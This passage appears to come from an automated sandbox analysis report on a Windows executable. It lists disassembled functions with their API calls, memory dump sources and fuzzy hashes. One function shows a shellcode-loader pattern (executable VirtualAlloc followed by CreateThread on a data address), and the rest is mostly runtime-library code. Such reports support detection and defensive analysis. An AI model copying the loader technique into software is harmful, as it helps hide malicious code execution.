                                                                            • Associated: 00000000.00000002.2051436268.000000000018C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLast$EnumLocalesSystem
                                                                            • String ID:
                                                                            • API String ID: 2417226690-0
                                                                            • Opcode ID: ef7a3646dea098f5ee6c4540ac0f9a9db2b048e6c8fd970e537d69dd01539a9a
                                                                            • Instruction ID: eb2c225c8cd4d6078a04d050895ad7e14bde29d2081c04b078be780543f584bc
                                                                            • Opcode Fuzzy Hash: ef7a3646dea098f5ee6c4540ac0f9a9db2b048e6c8fd970e537d69dd01539a9a
                                                                            • Instruction Fuzzy Hash: 7EF0E53A30020557CB149F35D855B6A7F94FFC1760F464459FE068B6A0C7719843D790
                                                                            Function 0013F545 Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,0013D804,?,20001004,00000000,00000002,?,?,0013CE04), ref: 0013F579
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051193941.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051314006.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000189000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051436268.000000000018C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: InfoLocale
                                                                            • String ID:
                                                                            • API String ID: 2299586839-0
                                                                            • Opcode ID: 00d85351ae6db138c07d665bc03feafbbf2e1afd157c8d630a9be4da8d622b45
                                                                            • Instruction ID: fe0de6d9455aa6806484e4cb67ae91ead439932be15616326d07ad007aaa523f
                                                                            • Opcode Fuzzy Hash: 00d85351ae6db138c07d665bc03feafbbf2e1afd157c8d630a9be4da8d622b45
                                                                            • Instruction Fuzzy Hash: 69E04F35940118BBCF126F61EC05A9E7E1AEF54760F004025FD1566171CB318D62AAD4
                                                                            Function 00135102 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_0000510E,0013477F), ref: 00135107
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051193941.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051314006.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000189000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051436268.000000000018C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExceptionFilterUnhandled
                                                                            • String ID:
                                                                            • API String ID: 3192549508-0
                                                                            • Opcode ID: e576b97a1c0449f1829f9c1b9d9d5f99ecc803e5709a040b1349669744a94196
                                                                            • Instruction ID: 55529a4f398e27ba9d365ed12b961389c999cb47a2b151e0af36e67b331b4be4
                                                                            • Opcode Fuzzy Hash: e576b97a1c0449f1829f9c1b9d9d5f99ecc803e5709a040b1349669744a94196
                                                                            • Instruction Fuzzy Hash:
                                                                            Function 00147C0D Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051193941.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051314006.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000189000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051436268.000000000018C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: HeapProcess
                                                                            • String ID:
                                                                            • API String ID: 54951025-0
                                                                            • Opcode ID: e6a0daaac2ef2c7e967fac2be224c0737b21aa2b559e5065dd661fb234bf36a5
                                                                            • Instruction ID: 9449b8ce837054cdb6798039cbdceefa548741a3c38a221a2681d724a22dea9e
                                                                            • Opcode Fuzzy Hash: e6a0daaac2ef2c7e967fac2be224c0737b21aa2b559e5065dd661fb234bf36a5
                                                                            • Instruction Fuzzy Hash: CFA00274716202CFAB40CF35BF9D34D3BE9BB46AD1B05806AA805CA970EF3486D09B01
                                                                            Function 00146AF8 Relevance: .3, Instructions: 327COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051193941.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051314006.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000189000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051436268.000000000018C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLastProcess$CurrentFeatureInfoLocalePresentProcessorTerminate
                                                                            • String ID:
                                                                            • API String ID: 3471368781-0
                                                                            • Opcode ID: b35755b1a912290dd7749e97c3e99f4b98c778e79fac831aeeb53f67aa5f1499
                                                                            • Instruction ID: e26699430ced01dc4539ee178116d94645ef8128693844a3fdd5528b2fc47b48
                                                                            • Opcode Fuzzy Hash: b35755b1a912290dd7749e97c3e99f4b98c778e79fac831aeeb53f67aa5f1499
                                                                            • Instruction Fuzzy Hash: FEB11675A007028BCB38AF64CC92BB7B3E9EF5530CF14456DE987C65A0EB75A985CB01
                                                                            Function 0014C274 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 55libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0013116F: __EH_prolog3_catch.LIBCMT ref: 00131176
                                                                              • Part of subcall function 0013116F: _strlen.LIBCMT ref: 00131188
                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0014C29C
                                                                              • Part of subcall function 00131852: _strlen.LIBCMT ref: 0013186A
                                                                            • _strlen.LIBCMT ref: 0014C2B7
                                                                            • _strlen.LIBCMT ref: 0014C2CD
                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0014C2EA
                                                                              • Part of subcall function 0014C20E: VirtualAlloc.KERNELBASE(00000000,000004AC,00001000,00000040,ole,00000000,?,?,0014C2FD), ref: 0014C222
                                                                              • Part of subcall function 0014C20E: CreateThread.KERNELBASE(00000000,00000000,00000188,00157018,00000000,00000000), ref: 0014C256
                                                                              • Part of subcall function 0014C20E: WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000,?,?,0014C2FD), ref: 0014C262
                                                                              • Part of subcall function 0014C20E: CloseHandle.KERNEL32(00000000,?,?,0014C2FD), ref: 0014C269
                                                                              • Part of subcall function 00131DFE: _Deallocate.LIBCONCRT ref: 00131E0D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051193941.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051314006.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000189000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051436268.000000000018C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _strlen$Handle$AddressAllocCloseCreateDeallocateH_prolog3_catchModuleObjectProcSingleThreadVirtualWait
                                                                            • String ID: Cons$Free$Madino Mino$kernel32.dll$ole
                                                                            • API String ID: 4115190924-2348686229
                                                                            • Opcode ID: 2893e4083aa1c704beaf889186bbf5bfd5d3eea9b921a16a49cd4677bb10334c
                                                                            • Instruction ID: 0243baa2dde74ccdf2a5f119973fcc19d49981760e7e0b12fdc24a8e4dcf79fc
                                                                            • Opcode Fuzzy Hash: 2893e4083aa1c704beaf889186bbf5bfd5d3eea9b921a16a49cd4677bb10334c
                                                                            • Instruction Fuzzy Hash: 5F015E71A00209ABDB15FBB4EC46CBE77B4EF55B10B500029F811A31A1EF749945C666
                                                                            Function 00137E18 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • type_info::operator==.LIBVCRUNTIME ref: 00137F37
                                                                            • ___TypeMatch.LIBVCRUNTIME ref: 00138045
                                                                            • _UnwindNestedFrames.LIBCMT ref: 00138197
                                                                            • CallUnexpected.LIBVCRUNTIME ref: 001381B2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051193941.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051314006.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000189000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051436268.000000000018C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                            • String ID: csm$csm$csm
                                                                            • API String ID: 2751267872-393685449
                                                                            • Opcode ID: 284f23fa9bc06fb185d7219fb9646572bf8c4b1f6e83a1d8957eea73607f0033
                                                                            • Instruction ID: c04596617d39929cf08e54838f60bb98d350d4806700bf187f448432fcc6c4a0
                                                                            • Opcode Fuzzy Hash: 284f23fa9bc06fb185d7219fb9646572bf8c4b1f6e83a1d8957eea73607f0033
                                                                            • Instruction Fuzzy Hash: 47B158B5800309EFCF29DFA4C8819AEBBB5BF24310F14455AF8156B252DB31DE52CB91
                                                                            Function 0014187C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 298COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051193941.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051314006.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000189000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051436268.000000000018C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID: 0-3907804496
                                                                            • Opcode ID: 387e538d791d966b1e536f402e9bcd824751e1fd35b07bb2283a147472ac56dd
                                                                            • Instruction ID: 529774b7b09dd0800362f67bab7784a70d50c0c27ab84072437e9c06c5ad8c4d
                                                                            • Opcode Fuzzy Hash: 387e538d791d966b1e536f402e9bcd824751e1fd35b07bb2283a147472ac56dd
                                                                            • Instruction Fuzzy Hash: 29B12570A04249BFEB15DF99C880BADBBB2FF55304F144159E901AB3A2EB709DC1CB61
                                                                            Function 00149AF9 Relevance: 12.2, APIs: 8, Instructions: 248COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCPInfo.KERNEL32(00B305D8,00B305D8,?,7FFFFFFF,?,00149DC9,00B305D8,00B305D8,?,00B305D8,?,?,?,?,00B305D8,?), ref: 00149B9F
                                                                            • __alloca_probe_16.LIBCMT ref: 00149C5A
                                                                            • __alloca_probe_16.LIBCMT ref: 00149CE9
                                                                            • __freea.LIBCMT ref: 00149D34
                                                                            • __freea.LIBCMT ref: 00149D3A
                                                                            • __freea.LIBCMT ref: 00149D70
                                                                            • __freea.LIBCMT ref: 00149D76
                                                                            • __freea.LIBCMT ref: 00149D86
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051193941.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051314006.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000189000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051436268.000000000018C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: __freea$__alloca_probe_16$Info
                                                                            • String ID:
                                                                            • API String ID: 127012223-0
                                                                            • Opcode ID: 68d2f546bc6a3c1884209950be3c12619a5014acbd2c0904b181e60aa728016c
                                                                            • Instruction ID: ea097dadd11f1a85500004298812b20989255610632ad98b493b9d79823413ac
                                                                            • Opcode Fuzzy Hash: 68d2f546bc6a3c1884209950be3c12619a5014acbd2c0904b181e60aa728016c
                                                                            • Instruction Fuzzy Hash: 7171E3B2D002056BDF219FA49C82FEF77E9DF99310F290059E914AB2A2E735DD4087A0
                                                                            Function 001344DD Relevance: 12.2, APIs: 8, Instructions: 175COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00134526
                                                                            • __alloca_probe_16.LIBCMT ref: 00134552
                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00134591
                                                                            • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001345AE
                                                                            • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 001345ED
                                                                            • __alloca_probe_16.LIBCMT ref: 0013460A
                                                                            • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0013464C
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0013466F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051193941.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051314006.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000189000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051436268.000000000018C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                            • String ID:
                                                                            • API String ID: 2040435927-0
                                                                            • Opcode ID: 9b48132416c029c2ef4c7d671d607f12fb68c4b02fe239fe2b8e6ce88e89fde9
                                                                            • Instruction ID: c01bd830bb117d3d6b329b264d041e7c540ae77a74c4fc6f47aa61db1acb7b62
                                                                            • Opcode Fuzzy Hash: 9b48132416c029c2ef4c7d671d607f12fb68c4b02fe239fe2b8e6ce88e89fde9
                                                                            • Instruction Fuzzy Hash: F851B3B2900206ABEF209F60DC46FAB7BB9EF41794F154529F915E71A0D730ED51CB60
                                                                            Function 001378B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _ValidateLocalCookies.LIBCMT ref: 001378E7
                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 001378EF
                                                                            • _ValidateLocalCookies.LIBCMT ref: 00137978
                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 001379A3
                                                                            • _ValidateLocalCookies.LIBCMT ref: 001379F8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051193941.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051314006.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000189000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051436268.000000000018C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                            • String ID: csm
                                                                            • API String ID: 1170836740-1018135373
                                                                            • Opcode ID: dbf7faa8a40d61911cc54111d7e3019578451c41436c3211182a4d1ca77a0dab
                                                                            • Instruction ID: 07b3b9b7da907073a08f17b72dedbe1dbb2244e2359c8b6b4c88e1b69960e3db
                                                                            • Opcode Fuzzy Hash: dbf7faa8a40d61911cc54111d7e3019578451c41436c3211182a4d1ca77a0dab
                                                                            • Instruction Fuzzy Hash: 8F41A774A04209DBCF10DF68C885BAEBBB5AF45328F148255F8159B3A2D731DA15CB91
                                                                            Function 00132307 Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog3.LIBCMT ref: 0013230E
                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00132318
                                                                            • int.LIBCPMT ref: 0013232F
                                                                              • Part of subcall function 00132867: std::_Lockit::_Lockit.LIBCPMT ref: 00132878
                                                                              • Part of subcall function 00132867: std::_Lockit::~_Lockit.LIBCPMT ref: 00132892
                                                                            • codecvt.LIBCPMT ref: 00132352
                                                                            • std::_Facet_Register.LIBCPMT ref: 00132369
                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00132389
                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 00132396
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051193941.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051314006.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000189000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051436268.000000000018C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                                                            • String ID:
                                                                            • API String ID: 2133458128-0
                                                                            • Opcode ID: b01d8937769ae7f8110e3946a3ddcc572ff026dec07a6a955afeda39a6ce9bcf
                                                                            • Instruction ID: 1ac4328e584984edc7dd82c3783bfdf641538695ffa000c0024f7657c94a2805
                                                                            • Opcode Fuzzy Hash: b01d8937769ae7f8110e3946a3ddcc572ff026dec07a6a955afeda39a6ce9bcf
                                                                            • Instruction Fuzzy Hash: 8701B535900219CBCF15FBA4D845ABE7BB5BFA4724F240509F4107B292DF78AE05CB91
                                                                            Function 0013239C Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog3.LIBCMT ref: 001323A3
                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 001323AD
                                                                            • int.LIBCPMT ref: 001323C4
                                                                              • Part of subcall function 00132867: std::_Lockit::_Lockit.LIBCPMT ref: 00132878
                                                                              • Part of subcall function 00132867: std::_Lockit::~_Lockit.LIBCPMT ref: 00132892
                                                                            • ctype.LIBCPMT ref: 001323E7
                                                                            • std::_Facet_Register.LIBCPMT ref: 001323FE
                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0013241E
                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 0013242B
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051193941.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051314006.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000189000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051436268.000000000018C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registerctype
                                                                            • String ID:
                                                                            • API String ID: 2958136301-0
                                                                            • Opcode ID: 4b3e6de0efbac964069b0d97509629a7df647e15ce1222b8f5534e613d801239
                                                                            • Instruction ID: bac167a75c39db53cceaabf3b9c362969207a9debf4b0840f1828b6f78b2acd3
                                                                            • Opcode Fuzzy Hash: 4b3e6de0efbac964069b0d97509629a7df647e15ce1222b8f5534e613d801239
                                                                            • Instruction Fuzzy Hash: 4801D8319002158BCF05FBA4D845ABEBB75AFA4720F64450AF9117B391CF74AF45CB91
                                                                            Function 00137AAA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetLastError.KERNEL32(?,?,00137AA1,00136070,00135152), ref: 00137AB8
                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00137AC6
                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00137ADF
                                                                            • SetLastError.KERNEL32(00000000,00137AA1,00136070,00135152), ref: 00137B31
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051193941.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051314006.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000189000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051436268.000000000018C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLastValue___vcrt_
                                                                            • String ID:
                                                                            • API String ID: 3852720340-0
                                                                            • Opcode ID: 063c72026e63988fc09969af3b7e4b2645c32a9d558061bba0479150c4039c36
                                                                            • Instruction ID: 019571904bba847979c1481bd6d9791352a66b9393020e0aa619b481222066d9
                                                                            • Opcode Fuzzy Hash: 063c72026e63988fc09969af3b7e4b2645c32a9d558061bba0479150c4039c36
                                                                            • Instruction Fuzzy Hash: F201F77261E3116EEE3527B47C8597F26D4EF213B1F24022BF515C28E1FF514D829250
                                                                            Function 0013C37F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,C118BA38,?,?,00000000,0014B356,000000FF,?,0013C30F,?,?,0013C2E3,00000000), ref: 0013C3B4
                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0013C3C6
                                                                            • FreeLibrary.KERNEL32(00000000,?,00000000,0014B356,000000FF,?,0013C30F,?,?,0013C2E3,00000000), ref: 0013C3E8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051193941.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051314006.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000189000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051436268.000000000018C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                            • API String ID: 4061214504-1276376045
                                                                            • Opcode ID: 436faf13f8248faac61c44c3d4a5b855b7ecfea6f8486c4a61b238976b1d2a45
                                                                            • Instruction ID: 7fd6e0a4fbb18e9bd69c7ae3119c16ec18a87e28e05719509b9a1762e556b387
                                                                            • Opcode Fuzzy Hash: 436faf13f8248faac61c44c3d4a5b855b7ecfea6f8486c4a61b238976b1d2a45
                                                                            • Instruction Fuzzy Hash: E301D636A44619AFCB118F54DC49FAEBBB8FB04B10F044129F811E3AB0DBB49940CB90
                                                                            Function 00133E12 Relevance: 7.5, APIs: 5, Instructions: 44COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog3.LIBCMT ref: 00133E19
                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00133E24
                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00133E92
                                                                              • Part of subcall function 00133F75: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00133F8D
                                                                            • std::locale::_Setgloballocale.LIBCPMT ref: 00133E3F
                                                                            • _Yarn.LIBCPMT ref: 00133E55
                                                                            Memory Dump Source
